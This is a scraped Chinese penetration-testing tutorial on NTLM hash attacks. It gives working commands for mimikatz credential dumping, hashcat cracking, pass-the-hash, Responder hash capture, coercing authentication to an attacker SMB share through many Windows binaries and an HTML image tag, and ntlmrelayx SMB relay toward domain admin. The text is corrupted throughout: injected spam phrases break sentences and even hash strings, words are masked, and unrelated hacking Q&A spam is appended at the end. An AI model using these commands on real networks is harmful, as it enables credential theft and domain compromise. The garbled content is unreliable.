如何做 *** 黑客-内网渗透——对于hash的攻击
文中从hash获得 *** ,工程爆破hash,hash中转,中继等层面全方位剖析,以直观详尽的实践活动来掌握攻击过程,过程较为详尽,请细心收看。
0x02 什么叫NTLM-hash、net NTLM-hash
NTLM hash是windows账户密码的一种hash,可从Windows系统软件中的SAM文档和域控的NTDS.dit文档中得到 全部客户的hash(例如用Mimikatz获取),获得该hash以后,可开展工程爆破密文、hach传送(PtH攻击),
Net-NTLM的hash是根据NTLM的hash值历经一定的优化算法造成的,获得Net-NTLM的hash以后,可开展工程爆破密文、运用 *** b开展中继攻击,访问 被 *** 黑客攻击的网址该hash不可以开展hach传送攻击。
什么叫NTLM hash?
NTLM hash的形成方式:
1、将密文动态口令转化成十六进制的文件格式
2、把十六进制转化成Unicode文件格式,每一个字节数以后加上0x00
3、再对Unicode字符串数组作MD4数据加密,形成32位系统的十六进制数字串
这儿我根据mimikatz专用工具先直观的掌握NTLM hash,mimikatz立即从 lsass.exe 里获得windows处在active情况账户弱密码,以windows server2012为例子:
从 *** 问 被 *** 黑客攻击的网址图发觉:
NTLM hash:A1E32A2281B8C6DBC2373BFF87E8CB6E
弱密码:123456Abc
0x03 对NTLM hash暴力破解密码
假如根据其他方式得到 此hash,即A1E32A2281B8C6DBC2373BFF87E8CB6E,能用hashcat开展词典暴力破解密码,Hashcat主要参数以下:
hashcat64.exe -m 1000 A1E32A2281B8C6DBC2373BFF87E8CB6E example.dict -o out.txt —force
主要参数表明:
-m 挑选hach类型,1000为NTLM
-o 輸出破译取得成功的密文
example.dict 密文词典
开启out.txt,发觉密文123456Abc
留意:
因为windows server2012 r2、windwos 8.1及其高些版本号都干了结构加固,即严禁密文缓存文件到运行内存,而mimikatz是根据运行内存获得弱密码,则没法立即根据mimikatz获得密文访问 被 *** 黑客攻击的网址登陆密码,立即获取結果为“null”,但可根据修改注册表来获得。
参照
受维护客户 ( Protected Users )
http://www.bubuko.com/infodetail-2077149.html
0x04 NTLMhach传送
hach传送通俗化而言,便是不用密文登陆,用NTLM hash可立即开展登陆。
在大家应用某服务项目时,Windows会携带本身的验证信息内容开展试着登陆,这一验证信息内容实际上便是Net-NTLM的Hash,大家应用什么服务项目会让Windows携带本身验证信息内容登陆?如浏览 *** b共享文件夹名称等访问 被 *** 黑客攻击的网址,这时会应用验证信息内容试着登陆,而且启用lsass运行内存中的hash缓存文件试着登陆,这时应用mimikatz等专用工具改动缓存文件的hash为获得获得的hash,进而应用改动的hash开展登陆,它是hach传送的基本原理。文章内容后边提到的获得Net-NTLM的hash,实际上便是运用带验证信息内容浏览 *** b,如让管理人员浏览此wdb:<img src="\\192.168.191.129xx">,192.168.191.129被攻击者操纵的一台内部网PC,可获得管理人员的Net-NTLM hash。
先讲下验证要求过程:
1、手机客户端先向在当地对密码加密变成登陆密码散列
2、手机客户端推送验证要求,即产生密文账户访问 被 *** 黑客攻击的网址
3、缺少对象一个16位的随机数字发给手机客户端,做为一个 challenge
4、手机客户端再用流程1的登陆密码散列来数据加密这一 challenge ,做为 response回到给 *** 服务器。
5、 *** 服务器把登录名、给手机客户端的challenge 、手机客户端回到的 response ,推送域控制器
6、域控制器应用此登录名在SAM账号管理库的登陆密码散列,数据加密给手机客户端的challenge
7、与流程4手机客户端数据加密的challenge较为,假如2个challenge一致,验证取得成功
hach传送系统漏洞产生在流程4中,立即应用改动缓存文件后的hash,开展challenge数据加密,对challenge 数据加密的hash早已并不是推送账户相匹配的hash,只是攻击者根据别的方式获得的hash开展challenge数据加密。
Pth攻击演试:
吊舱ip:
攻击机ip:
假定早已得到 NTLM hash:
管理员身份运作mimikatz:
mimikatz运行命令主要参数:
sekurlsa::pth /user:Ancert /domain:WIN-0HE0PTAL9L4 /ntlm:A1E32A2281B8C6DBC2373BFF87E8CB6E
这时再开展其他验证实际操作,可立即用获得的总体目标hash开展登陆验证。
访问 被 *** 黑客攻击的网址0x05 Net-NTLM hash获得
Net-NTLM hash不可以立即获得,根据Responder专用工具开展阻拦获得,此hash不可以开展hach传送,但可开展中继分享,运用Responder等中介人专用工具,融合其他专用工具可自动化技术开展阻拦获得并中继分享,其他专用工具如 Impacket的ntlmrelayx.py开展中继分享。
在攻击机里运作Responder,这时攻击机仿真模拟为 *** B服务项目让受害人开展验证登陆,根据设定好多个仿真模拟的故意守护进程(如SQL *** 服务器,FTP,HTTP和 *** B *** 服务器等)来立即提醒凭证或仿真模拟咨询 – 回应认证过程并捕捉手机客户端推送的必需 访问 被 *** 黑客攻击的网址 hash,当受害人设备试着登录攻击者设备,responder就可以获得受害人设备客户的NTLMv2hash值。。
Responder下载安裝:
https://github.com/lgandx/Responder
Responder实际操作演试
手机客户端IP:
攻击机IP:
1、 不用编写Responder.conf,由于这时 *** B、HTTP服务项目不必关掉,等中继攻击时才关掉这两个服务项目。因而这儿先演试Responder怎么获取net-NTLM 访问 被 *** 黑客攻击的网址 hash,在中继攻击里关掉 *** B、HTTP,是由于这时已不由Responder获得hash,只是立即让ntlmrelayx.py来进行这一每日任务。
2、 攻击机实行 python Responder.py -I eth0,这时处在监视情况
3、 运用 *** B协议,手机客户端在联接服务器端时,默认设置先应用该设备的登录名和登陆密码hash试着登陆,因此 能够仿真模拟 *** B *** 服务器进而捕获hash,实行以下指令都能够获得hash。
手机客户端实行以下指令,攻击机的Responder能接到。
> net.exe use \\hostshare 访问 被 *** 黑客攻击的网址
> attrib.exe \\hostshare
> bcdboot.exe \\hostshare
> bdeunlock.exe \\hostshare
> cacls.exe \\hostshare
> certreq.exe \\hostshare #(noisy, pops an error dialog)
> certutil.exe \\hostshare
> cipher.exe \\hostshare
> ClipUp.exe -l \\hostshare
> cmdl32.exe \\hostshare 访问 被 *** 黑客攻击的网址
> cmstp.exe /s \\hostshare
> colorcpl.exe \\hostshare #(noisy, pops an error dialog)
> comp.exe /N=0 \\hostshare \\hostshare
> compact.exe \\hostshare
> control.exe \\hostshare
> convertvhd.exe -source \\hostshare -destination \\hostshare
> Defrag.exe \\hostshare
> 访问 被 *** 黑客攻击的网址 diskperf.exe \\hostshare
> dispdiag.exe -out \\hostshare
> doskey.exe /MACROFILE=\\hostshare
> esentutl.exe /k \\hostshare
> expand.exe \\hostshare
> extrac32.exe \\hostshare
> FileHistory.exe \\hostshare #(noisy, pops a gui)
> findstr.exe * \\hostshare
> fontview.exe 访问 被 *** 黑客攻击的网址 \\hostshare #(noisy, pops an error dialog)
> fvenotify.exe \\hostshare #(noisy, pops an access denied error)
> FXSCOVER.exe \\hostshare #(noisy, pops GUI)
> hwrcomp.exe -check \\hostshare
> hwrreg.exe \\hostshare
> icacls.exe \\hostshare
{X }> licensingdiag.exe -cab \hostshare> lodctr.exe 浏览被黑客攻击的网站 \hostshare
> lpksetup.exe /p \hostshare /s
> makecab.exe \hostshare
> msiexec.exe /update \hostshare /quiet
> msinfo32.exe \hostshare #(noisy, pops a "cannot open" dialog)
> mspaint.exe \hostshare #(noisy, invalid path to png error)
> msra.exe /openfile \hostshare #(noisy, 浏览被黑客攻击的网站 error)
> mstsc.exe \hostshare #(noisy, error)
> netcfg.exe -l \hostshare -c p -i foo
客户端执行 net use 192.168.191.131aaa
4、 攻击机成功收到NTLMv2-SSP Hash
Ancert::WIN-0HEOPTAL9L4:75c3bef66ef94f92:2424A1EA007E01413DD6653404BB7819:0101000000000000C0653150DE09D2018D964804B8A33ECB000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D20106000浏览被黑客攻击的网站4000200000008003000300000000000000001000000002000007AC21B7085961E257ABD8B489929693CDD3E37B624EC1AA3C62AE0F11516CBF80A001000000000000000000000000000000000000900280063006900660073002F003100390032002E003100360038002E003100390031002E00310033003100000000000000000000000000
爆破net-NTLM hash
继续用hashcat进行hash爆破,Hashcat参数如下:
hashcat64.exe -m 5600 浏览被黑客攻击的网站 Ancert::WIN-0HEOPTAL9L4:75c3bef66ef94f92:2424A1EA007E01413DD6653404BB7819:0101000000000000C0653150DE09D2018D964804B8A33ECB000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E0浏览被黑客攻击的网站06C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D201060004000200000008003000300000000000000001000000002000007AC21B7085961E257ABD8B489929693CDD3E37B624EC1AA3C62AE0F11516CBF80A001000000000000000000000000000000000000900280063006900660073002F003100390032002E003100360038002E003100390031002E003100330031000000000000000000000浏览被黑客攻击的网站00000 example.dict -o out.txt --force
参数说明:
-m 选择哈希类别,5600为net-NTLM
成功破解出明文密码,如下图:
打开out.txt,发现破解出明文123456Abc
0x06 *** B中继攻击
前面文章说过了,当获取到net-NTLM hash之后,由于不能通过类似哈希传递的修改缓存hash进行认证,此hash无法进行哈希传递,怎么进行攻击呢?可通过Responder工具拦截管理员的net-NTLM 浏览被黑客攻击的网站 hash,配合ntlmrelayx.py进行中继转发。
Impacket下载:
git clone https://github.com/CoreSecurity/impacket.git
进行中继前提:目标 *** B签名需要关闭,在 *** B连接中,需要使用安全机制来保护服务器和客户端之间传输数据的完整性,而这种安全机制就是 *** B签名和加密,如果关闭 *** B签名,会允许攻击者拦截认证过程,并且将获得hash在其他机器上进行重放,,从而获得域管权限。
目前 *** B常用来做为 *** B文件共享、打印机,如果签名关闭,可能导致文件共享、打印机被入侵。
比如我用虚拟机搭建的 *** B文件共享如下,具体认证登录过程文章前面部分已讲过,看看这个效果:
虚拟机IP:1浏览被黑客攻击的网站92.168.191.139
先探测目标是否已关闭 *** B签名,命令如下:
nmap --script *** b-security-mode.nse -p445 192.168.191.139 --open
如下是我用虚拟机搭建的域控环境测试,中继转发操作:
域内普通用户-受害者机器(win7)
域管理员(administrator)机器(windows server 2012 r2)
kali linux 攻击者机器
1、Responder关闭 *** B、HTTP
2、执行python Responder.py -I eth0 -r -d –w
3、执行python ntlmrelayx.py 浏览被黑客攻击的网站 -tf targets.txt -socks - *** b2support
说明 :
targets.txt内容为域内受害IP 192.168.191.139
python ntlmrelayx.py -t 192.168.191.139 -socks - *** b2support //
4、域管模拟输入一个共享,生成一个LLMNR请求
5、通过Responder发送
6、NTLMv2哈希凭据被中继
攻击流程总结:
1、关闭Responder的 *** B和HTTP服务, 运行Responder工具来截取Net-NTLM哈希值
2、运行ntlmrelayx.py脚本,将Net-NTLM哈希值发送到ntlmrelayx.py脚本的 *** B和HTTP服务
3、ntlmrelayx.py将hash发送到目标列表中,如果中继操作执行成功会触发通知命令。
这里先大概熟悉下中继转发的原理基础,在下一篇会结合DeathStar和Empire,演示自动化域渗透,以及对net NTLM-hash的利用。
本文由安全客原创发布
这种情况是很有可能的,只要出现这种问题手机也是很容易中病毒的。所以更好升级一下手机系统。升级的 *** 有许多种,你可以在手机自身的系统升级功能对手机。怎么做黑客 *** 迷yao暗语。相同的问题,有人会吗拜托,做这种图片跟黑客一毛钱关系都没有,随便一个会PS的都可以做出这种图片。 怎么做黑客不是说有cookie或者能上传就一定可以上传的,现在很多程序都检测浏览被黑客攻击的网站了文件后缀名,部分有漏洞可以通过双文件,截断等方式绕过,但具体得看上传时的一些情况从图中看到 都是用主机访问其他主机的80端口,即浏览网页,至于135、445、1025大都是windows系统默认开启的端口(虽然。 假的,我也上过当,被骗了二千元整。就当给黄志炜先生吃药了烧纸钱了。祝骗子们早点到阴间报到。 很简单,有一款软件叫做灰鸽子,如果我没猜错的话对方应该发了个软件给你并交你打开了吧?如果你别控制了,你的电脑就叫"肉鸡" *** 的出现在。怎么做黑客 黑客一般用kalilinux系统。一般黑客很少针对个人进行攻击,如果针对个人那么可以用钓鱼网站和木马软件,靶机点开钓鱼网站或木马软件后,你的终端就能看见靶机的。 怎么做黑客本书为黑客江湖1、2合集,是全本。楼主你好浏览被黑客攻击的网站,我是之一个发送的啊很高兴为你回答问题呀~请稍等一下呢,所需资源正在发送中哦~~◇没有收到的话。
标签:
版权声明
本文仅代表作者观点,不代表本站立场。
本文系作者授权发表,未经许可,不得转载。